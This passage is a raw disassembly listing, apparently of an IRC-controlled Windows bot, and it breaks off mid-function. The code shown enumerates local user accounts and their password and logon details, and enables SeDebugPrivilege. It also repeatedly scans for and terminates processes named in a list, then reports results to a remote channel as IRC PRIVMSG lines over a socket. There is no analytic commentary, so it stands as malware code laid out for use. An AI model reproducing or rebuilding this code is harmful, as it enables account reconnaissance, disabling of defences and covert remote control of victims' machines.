mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_419177
push [ebp+arg_4]
mov edi, eax
call sub_419177
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_419177
add esp, 0Ch
mov [ebp+var_20], eax
and [ebp+var_14], 0
and [ebp+var_10], 0
push 1
and [ebp+var_8], 0
pop eax
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_24]
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_4CB8AC
pop edi
leave
retn
sub_4193C8 endp
; =============== S U B R O U T I N E =======================================
sub_419422 proc near ; CODE XREF: sub_4192FC+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_419177
push [esp+8+arg_4]
mov esi, eax
call sub_419177
pop ecx
pop ecx
push eax
push esi
call dword_4CB89C
pop esi
retn
sub_419422 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419443 proc near ; CODE XREF: sub_4192FC+2D�p
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_419177
push [ebp+arg_4]
mov esi, eax
call sub_419177
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_4CBA2C
test eax, eax
mov [ebp+arg_0], eax
jnz loc_4197EB
mov eax, [ebp+var_4]
test eax, eax
jz loc_419826
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_204]
push offset aAccountS ; "Account: %S"
push eax
call sub_41C266
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+0Ch]
lea eax, [ebp+var_204]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+8]
lea eax, [ebp+var_204]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4]
lea eax, [ebp+var_204]
push offset aCommentS ; "Comment: %S"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
mov eax, [eax+10h]
sub eax, 0
jz short loc_419562
dec eax
jz short loc_41955B
dec eax
jz short loc_419554
mov eax, offset aUnknown ; "Unknown"
jmp short loc_419567
; ---------------------------------------------------------------------------
loc_419554: ; CODE XREF: sub_419443+108�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_419567
; ---------------------------------------------------------------------------
loc_41955B: ; CODE XREF: sub_419443+105�j
mov eax, offset aUser_3 ; "User"
jmp short loc_419567
; ---------------------------------------------------------------------------
loc_419562: ; CODE XREF: sub_419443+102�j
mov eax, offset aGuest ; "Guest"
loc_419567: ; CODE XREF: sub_419443+10F�j
; sub_419443+116�j ...
push eax
lea eax, [ebp+var_204]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+14h]
lea eax, [ebp+var_204]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_204]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+20h]
lea eax, [ebp+var_204]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+18h]
lea eax, [ebp+var_204]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+2Ch]
lea eax, [ebp+var_204]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+30h]
lea eax, [ebp+var_204]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+24h]
lea eax, [ebp+var_204]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+28h]
lea eax, [ebp+var_204]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+34h]
lea eax, [ebp+var_204]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_204]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+38h]
lea eax, [ebp+var_204]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_41C266
push 1
push esi
lea eax, [ebp+var_204]
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_204]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+40h]
lea eax, [ebp+var_204]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+44h]
lea eax, [ebp+var_204]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409869
add esp, 20h
pop edi
pop ebx
jmp short loc_419817
; ---------------------------------------------------------------------------
loc_4197EB: ; CODE XREF: sub_419443+35�j
push eax
lea eax, [ebp+var_204]
push offset unk_439CE8
push eax
call sub_41C266
push 0
lea eax, [ebp+var_204]
push [ebp+arg_10]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_409869
add esp, 20h
loc_419817: ; CODE XREF: sub_419443+3A6�j
cmp [ebp+var_4], 0
jz short loc_419826
push [ebp+var_4]
call dword_4CBA64
loc_419826: ; CODE XREF: sub_419443+40�j
; sub_419443+3D8�j
mov eax, [ebp+arg_0]
pop esi
leave
retn
sub_419443 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41982C proc near ; CODE XREF: sub_401ACD+463A�p
var_218 = byte ptr -218h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+arg_C]
mov [ebp+var_4], esi
call sub_419177
push esi
mov [ebp+var_14], eax
push [ebp+arg_8]
mov [ebp+arg_C], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
push offset aUsernameAccoun ; "Username accounts for local system:"
mov [ebp+var_8], esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 18h
loc_41986B: ; CODE XREF: sub_41982C+135�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
push esi
push [ebp+var_14]
call dword_4CB934
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_4198CC
cmp eax, 0EAh
jz short loc_4198CC
push eax
push eax
call sub_4199AC
pop ecx
push eax
lea eax, [ebp+var_218]
push offset unk_439ED8
push eax
call sub_41C266
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 24h
jmp short loc_419947
; ---------------------------------------------------------------------------
loc_4198CC: ; CODE XREF: sub_41982C+62�j
; sub_41982C+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz loc_41995A
xor ebx, ebx
cmp [ebp+arg_C], esi
jbe short loc_419947
loc_4198DE: ; CODE XREF: sub_41982C+ED�j
cmp edi, esi
jz short loc_41991D
push dword ptr [edi]
lea eax, [ebp+var_218]
push offset aS_4 ; " %S"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+arg_C]
jb short loc_4198DE
jmp short loc_419947
; ---------------------------------------------------------------------------
loc_41991D: ; CODE XREF: sub_41982C+B4�j
lea eax, [ebp+var_218]
push offset unk_439EA4
push eax
call sub_41C266
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 1Ch
loc_419947: ; CODE XREF: sub_41982C+9E�j
; sub_41982C+B0�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_41995A
push edi
call dword_4CBA64
xor edi, edi
mov [ebp+var_4], edi
loc_41995A: ; CODE XREF: sub_41982C+A5�j
; sub_41982C+120�j
cmp [ebp+var_C], 0EAh
jz loc_41986B
cmp edi, esi
jz short loc_419972
push edi
call dword_4CBA64
loc_419972: ; CODE XREF: sub_41982C+13D�j
push [ebp+var_8]
lea eax, [ebp+var_218]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_41C266
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_41982C endp
; =============== S U B R O U T I N E =======================================
sub_4199AC proc near ; CODE XREF: sub_418FE5+41�p
; sub_4191DB+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_419A5E
jz loc_419A57
cmp eax, 7Bh
ja short loc_419A23
jz short loc_419A19
cmp eax, 5
jz short loc_419A0F
cmp eax, 8
jz short loc_419A05
cmp eax, 32h
jz short loc_4199FB
cmp eax, 35h
jz short loc_4199F1
cmp eax, 57h
jnz loc_419AAD
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_4199F1: ; CODE XREF: sub_4199AC+30�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_4199FB: ; CODE XREF: sub_4199AC+2B�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_419A05: ; CODE XREF: sub_4199AC+26�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_419A0F: ; CODE XREF: sub_4199AC+21�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_419A19: ; CODE XREF: sub_4199AC+1C�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_419A23: ; CODE XREF: sub_4199AC+1A�j
sub eax, 7Ch
jz short loc_419A50
sub eax, 7C8h
jz short loc_419A49
dec eax
jz short loc_419A3F
dec eax
jnz short loc_419AAD
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_419A3F: ; CODE XREF: sub_4199AC+84�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_419ACE
; ---------------------------------------------------------------------------
loc_419A49: ; CODE XREF: sub_4199AC+81�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419A50: ; CODE XREF: sub_4199AC+7A�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419A57: ; CODE XREF: sub_4199AC+11�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419A5E: ; CODE XREF: sub_4199AC+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_419A97
jz short loc_419A90
sub eax, 8ADh
jz short loc_419AC2
dec eax
dec eax
jz short loc_419A89
dec eax
jz short loc_419A82
dec eax
dec eax
jnz short loc_419AAD
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419A82: ; CODE XREF: sub_4199AC+C9�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419A89: ; CODE XREF: sub_4199AC+C6�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419A90: ; CODE XREF: sub_4199AC+BB�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419A97: ; CODE XREF: sub_4199AC+B9�j
sub eax, 8CAh
jz short loc_419AC9
sub eax, 17h
jz short loc_419AC2
sub eax, 25h
jz short loc_419ABB
sub eax, 29h
jz short loc_419AB4
loc_419AAD: ; CODE XREF: sub_4199AC+35�j
; sub_4199AC+87�j ...
push offset aAnUnknownErr_0 ; "An unknown error occurred."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419AB4: ; CODE XREF: sub_4199AC+FF�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419ABB: ; CODE XREF: sub_4199AC+FA�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419AC2: ; CODE XREF: sub_4199AC+C2�j
; sub_4199AC+F5�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_419ACE
; ---------------------------------------------------------------------------
loc_419AC9: ; CODE XREF: sub_4199AC+F0�j
push offset aNetworkConnect ; "Network connection not found."
loc_419ACE: ; CODE XREF: sub_4199AC+40�j
; sub_4199AC+4A�j ...
push offset dword_4DB5E0
call sub_41C266
pop ecx
mov eax, offset dword_4DB5E0
pop ecx
retn
sub_4199AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419AE0 proc near ; CODE XREF: sub_401ACD+467F�p
var_718 = byte ptr -718h
var_318 = byte ptr -318h
var_108 = byte ptr -108h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_718]
push eax
call sub_41E0D4
add esp, 0Ch
lea eax, [ebp+arg_0]
mov esi, 108h
push eax
lea eax, [ebp+var_108]
push eax
mov [ebp+arg_0], esi
call ds:dword_4270C8 ; GetComputerNameA
lea eax, [ebp+var_108]
push esi
push eax
lea eax, [ebp+var_318]
push eax
call sub_41E0D4
lea eax, [ebp+var_718]
push eax
call sub_41E0B7
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_318]
push 0
push eax
push 0
call dword_4CB9E4
test eax, eax
jnz short loc_419B70
mov esi, offset dword_4DB3DC
push offset unk_43A20C
push esi
call sub_41C266
pop ecx
pop ecx
jmp short loc_419B99
; ---------------------------------------------------------------------------
loc_419B70: ; CODE XREF: sub_419AE0+7A�j
lea ecx, [ebp+var_718]
push ecx
lea ecx, [ebp+var_318]
push ecx
push eax
call sub_4199AC
pop ecx
mov esi, offset dword_4DB3DC
push eax
push offset dword_43A1E0
push esi
call sub_41C266
add esp, 14h
loc_419B99: ; CODE XREF: sub_419AE0+8E�j
mov eax, esi
pop esi
leave
retn
sub_419AE0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B9E proc near ; CODE XREF: sub_4172C1+45�p
; sub_4172C1+166�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_427104 ; GetCurrentProcess
push eax
call dword_4CB9B8 ; OpenProcessToken
test eax, eax
jnz short loc_419BBD
leave
retn
; ---------------------------------------------------------------------------
loc_419BBD: ; CODE XREF: sub_419B9E+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call dword_4CB990 ; LookupPrivilegeValueA
test eax, eax
jz short loc_419BFB
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_419BE4
or [ebp+var_8], 2
jmp short loc_419BE8
; ---------------------------------------------------------------------------
loc_419BE4: ; CODE XREF: sub_419B9E+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_419BE8: ; CODE XREF: sub_419B9E+44�j
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push esi
push [ebp+var_4]
call dword_4CBA40 ; AdjustTokenPrivileges
mov esi, eax
loc_419BFB: ; CODE XREF: sub_419B9E+32�j
push [ebp+var_4]
call ds:dword_427070 ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_419B9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419C09 proc near ; CODE XREF: sub_401ACD+7770�p
; sub_419E38+74�p ...
var_554 = byte ptr -554h
var_354 = dword ptr -354h
var_350 = byte ptr -350h
var_234 = byte ptr -234h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_128 = dword ptr -128h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 554h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp dword_4CB9F4, ebx
lea edi, [ebp+var_12C]
mov [ebp+var_130], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_350]
mov [ebp+var_354], ebx
rep stosd
jz loc_419E08
cmp dword_4CB9D8, ebx
jz loc_419E08
cmp dword_4CB8E8, ebx
jz loc_419E08
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_419B9E
pop ecx
pop ecx
push ebx
push 0Fh
call dword_4CB9F4 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_8], edi
jz loc_419DFB
lea eax, [ebp+var_130]
mov [ebp+var_130], 128h
push eax
push edi
call dword_4CB9D8 ; Process32First
mov esi, ds:dword_427070
test eax, eax
jz loc_419DF6
lea eax, [ebp+var_130]
push eax
push edi
call dword_4CB8E8 ; Process32Next
test eax, eax
jz loc_419DF6
mov edi, ds:dword_42708C
mov ebx, 1F0FFFh
loc_419CCD: ; CODE XREF: sub_419C09+1E5�j
xor eax, eax
cmp [ebp+arg_10], eax
jz short loc_419D34
mov [ebp+var_4], offset off_43A238
loc_419CDB: ; CODE XREF: sub_419C09+F3�j
mov eax, [ebp+var_4]
push dword ptr [eax]
lea eax, [ebp+var_10C]
push eax
call ds:dword_42718C ; lstrcmpi
test eax, eax
jz short loc_419D03
add [ebp+var_4], 4
cmp [ebp+var_4], offset aI11r54n4_exe ; "i11r54n4.exe"
jb short loc_419CDB
jmp loc_419DDC
; ---------------------------------------------------------------------------
loc_419D03: ; CODE XREF: sub_419C09+E6�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jz loc_419DDC
push 0
push eax
call ds:dword_4270FC ; TerminateProcess
test eax, eax
jnz loc_419DDC
loc_419D2A: ; CODE XREF: sub_419C09+1B9�j
push [ebp+var_4]
call esi ; CloseHandle
jmp loc_419DDC
; ---------------------------------------------------------------------------
loc_419D34: ; CODE XREF: sub_419C09+C9�j
cmp [ebp+arg_C], eax
jnz loc_419DC7
cmp [ebp+arg_4], eax
jz loc_419DDC
push [ebp+var_128]
push 8
call dword_4CB9F4 ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov [ebp+var_4], eax
mov [ebp+var_354], 224h
jz short loc_419D87
lea ecx, [ebp+var_354]
push ecx
push eax
call dword_4CB894 ; Module32First
push [ebp+var_128]
test eax, eax
jz short loc_419D8D
lea eax, [ebp+var_234]
jmp short loc_419D93
; ---------------------------------------------------------------------------
loc_419D87: ; CODE XREF: sub_419C09+15C�j
push [ebp+var_128]
loc_419D8D: ; CODE XREF: sub_419C09+174�j
lea eax, [ebp+var_10C]
loc_419D93: ; CODE XREF: sub_419C09+17C�j
push eax
lea eax, [ebp+var_554]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_41C266
add esp, 10h
lea eax, [ebp+var_554]
push 1
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
jmp loc_419D2A
; ---------------------------------------------------------------------------
loc_419DC7: ; CODE XREF: sub_419C09+12E�j
push [ebp+arg_C]
lea eax, [ebp+var_10C]
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_419E0F
loc_419DDC: ; CODE XREF: sub_419C09+F5�j
; sub_419C09+10A�j ...
lea eax, [ebp+var_130]
push eax
push [ebp+var_8]
call dword_4CB8E8 ; Process32Next
test eax, eax
jnz loc_419CCD
xor ebx, ebx
loc_419DF6: ; CODE XREF: sub_419C09+9D�j
; sub_419C09+B3�j
push [ebp+var_8]
call esi ; CloseHandle
loc_419DFB: ; CODE XREF: sub_419C09+77�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_419B9E
pop ecx
pop ecx
loc_419E08: ; CODE XREF: sub_419C09+3A�j
; sub_419C09+46�j ...
xor eax, eax
loc_419E0A: ; CODE XREF: sub_419C09+22D�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_419E0F: ; CODE XREF: sub_419C09+1D1�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
push [ebp+var_8]
mov edi, eax
call esi ; CloseHandle
push 0
push edi
call ds:dword_4270FC ; TerminateProcess
test eax, eax
jnz short loc_419E33
push edi
call esi ; CloseHandle
jmp short loc_419E08
; ---------------------------------------------------------------------------
loc_419E33: ; CODE XREF: sub_419C09+223�j
push 1
pop eax
jmp short loc_419E0A
sub_419C09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E38 proc near ; DATA XREF: sub_401ACD+2687�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 298h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
push offset unk_43A438
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_298]
push eax
call sub_41C266
xor esi, esi
pop ecx
cmp [ebp+var_8], esi
pop ecx
jnz short loc_419E97
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_409869
add esp, 14h
loc_419E97: ; CODE XREF: sub_419E38+3D�j
push [ebp+var_10]
lea eax, [ebp+var_94]
push esi
push esi
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_419C09
add esp, 18h
test eax, eax
jnz short loc_419EBF
push offset unk_43A414
jmp short loc_419EC4
; ---------------------------------------------------------------------------
loc_419EBF: ; CODE XREF: sub_419E38+7E�j
push offset unk_43A3F0
loc_419EC4: ; CODE XREF: sub_419E38+85�j
lea eax, [ebp+var_298]
push eax
call sub_41C266
cmp [ebp+var_8], esi
pop ecx
pop ecx
jnz short loc_419EF7
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_409869
add esp, 14h
loc_419EF7: ; CODE XREF: sub_419E38+9D�j
lea eax, [ebp+var_298]
push eax
call sub_415D38
push [ebp+var_14]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_419E38 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419F16 proc near ; CODE XREF: sub_401ACD+7712�p
; sub_40B4F5+53�p
arg_0 = dword ptr 4
push esi
push edi
push 1
pop edi
push [esp+8+arg_0]
push 0
push 1F0FFFh
call ds:dword_42708C ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_419F48
push 0
push esi
call ds:dword_4270FC ; TerminateProcess
test eax, eax
jnz short loc_419F48
push esi
xor edi, edi
call ds:dword_427070 ; CloseHandle
loc_419F48: ; CODE XREF: sub_419F16+1A�j
; sub_419F16+27�j
mov eax, edi
pop edi
pop esi
retn
sub_419F16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_419F4D proc near ; DATA XREF: sub_401221+3CD�o
push esi
xor esi, esi
loc_419F50: ; CODE XREF: sub_419F4D+1E�j
push 1
push esi
push esi
push esi
push esi
push esi
call sub_419C09
add esp, 18h
push dword_43A234
call ds:dword_427080 ; Sleep
jmp short loc_419F50
sub_419F4D endp
; =============== S U B R O U T I N E =======================================
sub_419F6D proc near ; CODE XREF: sub_419F9D+2A�p
; sub_419FD5+7E�p ...
mov eax, dword_4DBC48
push esi
mov esi, ds:dword_427070
cmp eax, 0FFFFFFFFh
jz short loc_419F81
push eax
call esi ; CloseHandle
loc_419F81: ; CODE XREF: sub_419F6D+F�j
mov eax, dword_4DBC50
cmp eax, 0FFFFFFFFh
jz short loc_419F8E
push eax
call esi ; CloseHandle
loc_419F8E: ; CODE XREF: sub_419F6D+1C�j
mov eax, dword_4DBC44
cmp eax, 0FFFFFFFFh
jz short loc_419F9B
push eax
call esi ; CloseHandle
loc_419F9B: ; CODE XREF: sub_419F6D+29�j
pop esi
retn
sub_419F6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419F9D proc near ; CODE XREF: sub_401ACD+7475�p
; sub_416000+14A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_41B9C0
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+arg_0]
push dword_4DBC4C
call ds:dword_4270F0 ; WriteFile
test eax, eax
jnz short loc_419FD0
call sub_419F6D
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_419FD0: ; CODE XREF: sub_419F9D+28�j
push 1
pop eax
leave
retn
sub_419F9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419FD5 proc near ; CODE XREF: sub_41A05C+D3�p
; sub_41A05C+F2�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push offset byte_43DB88
push [ebp+arg_4]
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_41A018
push 7D0h
call ds:dword_427080 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS_1 ; "PRIVMSG %s :%s\r"
push eax
call sub_41C266
add esp, 10h
jmp short loc_41A02F
; ---------------------------------------------------------------------------
loc_41A018: ; CODE XREF: sub_419FD5+1A�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS_8 ; "%s"
push eax
call sub_41C266
add esp, 0Ch
loc_41A02F: ; CODE XREF: sub_419FD5+41�j
lea eax, [ebp+var_200]
push 0
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
test eax, eax
jg short loc_41A058
call sub_419F6D
